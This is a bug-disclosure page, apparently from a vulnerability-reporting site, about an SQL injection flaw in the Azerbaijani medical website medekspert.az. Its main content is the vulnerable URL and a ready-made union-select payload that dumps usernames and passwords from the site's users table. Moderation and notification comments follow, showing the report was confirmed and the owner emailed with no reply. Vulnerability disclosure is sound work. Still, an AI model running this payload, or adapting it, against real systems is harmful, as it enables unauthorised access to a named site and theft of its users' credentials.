1. BUGemot
  2. SQL injection

SQL injection

medekspert.az 10 September 2016, 16:12

Detailed information

Saytda SQL İnjection mövcuddur.
Bu boşluqdan istifadə edərək saytda yerləşdirilmiş məlumatları (Parollar, saytın strukturu və s. əldə etmək olar)

Sql inject here: http://www.medekspert.az/index.php?type=xestelik&cid=25
Sql manual adress ( Username & password): http://www.medekspert.az/index.php?type=xestelik&cid=-25'+union+select+1,2,3,4,5,group_concat(username,0x3a,password),7,8,9,10+from+users--+-'

Comments

  • 02 November 2016, 13:36
    Vulnerability status
    Have not any information from source

  • 04 October 2016, 10:06
    Added point to Vulnerability
    For translate of bug gived 7 point to translator

  • 04 October 2016, 10:06
    Added point to Vulnerability
    For translate of bug gived 1 point to translator

  • 14 September 2016, 10:53
    Vulnerability status
    Sended e-mail to source about vulnerability

  • 11 September 2016, 13:48
    Added point to Vulnerability
    Moderator gave 7 point from 10 to vulnerability

  • 11 September 2016, 13:47
    Vulnerability status
    Confirmed by Moderator

  • 10 September 2016, 16:12
    Vulnerability added
    Vulnerability added to BUGemot